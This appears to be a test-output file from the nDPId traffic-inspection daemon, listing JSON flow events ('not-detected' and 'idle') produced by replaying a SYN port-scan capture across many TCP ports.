-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 